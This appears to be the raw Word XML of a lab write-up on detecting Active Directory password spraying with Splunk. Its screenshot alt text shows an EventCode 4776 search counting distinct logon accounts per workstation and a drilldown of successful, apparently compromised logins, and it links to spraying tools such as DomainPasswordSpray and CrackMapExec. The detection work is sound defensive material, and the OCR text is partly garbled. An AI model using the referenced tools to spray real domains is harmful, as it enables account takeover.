            <wp:docPr id="14" name="Picture 14" descr="index=&quot;wineventlog&quot; windomain. local &quot; EventCode=4776 &#10;timechart span=5m dc(Logon_Account) as Distinct_Logon_Account by Source_Workstation &#10;1,005 events (5/16/21 PM to 5/16/21 PM) No Event Sampling &#10;Events (1,005) &#10;Line Chart &#10;400 &#10;200 &#10;9:15 PM &#10;sun May 16 &#10;2021 &#10;Patterns &#10;Format &#10;920 PM &#10;Statistics (13) &#10;Trellis &#10;9:26 PM &#10;Visualization &#10;9:20 PM &#10;g:gs PM &#10;940 PM &#10;9:45 PM &#10;g:so PM &#10;9:55 PM &#10;1000 PM &#10;O Job &#10;loos PM &#10;10:10 PM &#10;Last 1 hour • &#10;Verbose Mode • &#10;— WINIO &#10;10:16 PM &#10;Unique Logon Account Auth Attempts by Source Workstation (Timechat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dex=&quot;wineventlog&quot; windomain. local &quot; EventCode=4776 &#10;timechart span=5m dc(Logon_Account) as Distinct_Logon_Account by Source_Workstation &#10;1,005 events (5/16/21 PM to 5/16/21 PM) No Event Sampling &#10;Events (1,005) &#10;Line Chart &#10;400 &#10;200 &#10;9:15 PM &#10;sun May 16 &#10;2021 &#10;Patterns &#10;Format &#10;920 PM &#10;Statistics (13) &#10;Trellis &#10;9:26 PM &#10;Visualization &#10;9:20 PM &#10;g:gs PM &#10;940 PM &#10;9:45 PM &#10;g:so PM &#10;9:55 PM &#10;1000 PM &#10;O Job &#10;loos PM &#10;10:10 PM &#10;Last 1 hour • &#10;Verbose Mode • &#10;— WINIO &#10;10:16 PM &#10;Unique Logon Account Auth Attempts by Source Workstation (Timechatt)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40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1D700E05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6ED6A31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B3AA76E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30AD0695" w:rsidR="30AD0695">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="30AD0695" w:rsidP="30AD0695" w:rsidRDefault="30AD0695" w14:paraId="09E6B49F" w14:textId="25FD7B45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30AD0695" w:rsidP="30AD0695" w:rsidRDefault="30AD0695" w14:paraId="50A08021" w14:textId="5BDAFB0A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="5436024C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 Investigation Dashboard Pane: Successful Auth Drilldown, by source, showing accounts compromised.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703078F" w14:textId="777777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7FADAD" wp14:editId="2736B724">
            <wp:extent cx="13696950" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15" name="Picture 15" descr="Search &#10;splunksenterprise &#10;2021-05-16 &#10;•45: 57 &#10;2021-05-16 &#10;• 48: 52 &#10;2021-05-16 &#10;2021-05-16 &#10;Apps &#10;Datasets &#10;Reports &#10;Alerts &#10;Dashboards &#10;Administrator • &#10;Source_Workstation &#10;Messages • &#10;Settings • &#10;Activity &#10;Analytics &#10;Help • Find &#10;Search &amp; Reporting &#10;Successful Authentications By Source_Workstation (Drilldown) &#10;Source_Workstation &#10;Edit &#10;Last 24 hours &#10;Action &#10;success &#10;success &#10;DC &#10;Date/Time : &#10;21 . &#10;21. &#10;07: 56: 55 &#10;Hide Filters &#10;Logon_Account &#10;Facces &#10;vagrant &#10;Export &#10;Successful_Logi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arch &#10;splunksenterprise &#10;2021-05-16 &#10;•45: 57 &#10;2021-05-16 &#10;• 48: 52 &#10;2021-05-16 &#10;2021-05-16 &#10;Apps &#10;Datasets &#10;Reports &#10;Alerts &#10;Dashboards &#10;Administrator • &#10;Source_Workstation &#10;Messages • &#10;Settings • &#10;Activity &#10;Analytics &#10;Help • Find &#10;Search &amp; Reporting &#10;Successful Authentications By Source_Workstation (Drilldown) &#10;Source_Workstation &#10;Edit &#10;Last 24 hours &#10;Action &#10;success &#10;success &#10;DC &#10;Date/Time : &#10;21 . &#10;21. &#10;07: 56: 55 &#10;Hide Filters &#10;Logon_Account &#10;Facces &#10;vagrant &#10;Export &#10;Successful_Login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91F86" w14:paraId="0A45CCA6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32C8ABA9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576E4471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* Note: A Full Dashboard showing correalted metrics could be created incorporating these examples and more.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="3C4478E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29DFAF5B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p w:rsidR="00000000" w:rsidRDefault="00D91F86" w14:paraId="055703B0" w14:textId="77777777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 </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00000000">
      <w:pgSz w:w="23040" w:h="3168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01151"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1868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oNotDisplayPageBoundaries/>
  <w:trackRevisions w:val="false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86"/>
    <w:rsid w:val="00D91F86"/>
    <w:rsid w:val="30AD0695"/>
    <w:rsid w:val="5952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0455D6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1351728A-1A0D-40DB-BF99-5BDAE8E9FA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msonormal0" w:customStyle="1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8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6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5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darkoperator.com/blog/2016/7/30/creating-real-looking-user-accounts-in-ad-lab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8.png" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.detectionlab.network/introduction/" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dafthack/DomainPasswordSpray" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/byt3bl33d3r/CrackMapExec" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png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media/image12.png" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="R3c098ef2102e4e97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="R44866fda51584b76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/research/reports/under-the-hoodie-2020/" TargetMode="External" Id="R91796febb72b4078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image13.png" Id="Ra5061911228141b3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jaapbrasser.com/active-directory-friday-list-password-information-for-domain-administrators/" TargetMode="External" Id="Rbe8b2bf67e554a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 Grindall</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Dan Grindall</lastModifiedBy>
  <revision>4</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-17T04:14:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-24T22:34:39.1499132Z</dcterms:modified>
</coreProperties>
</file>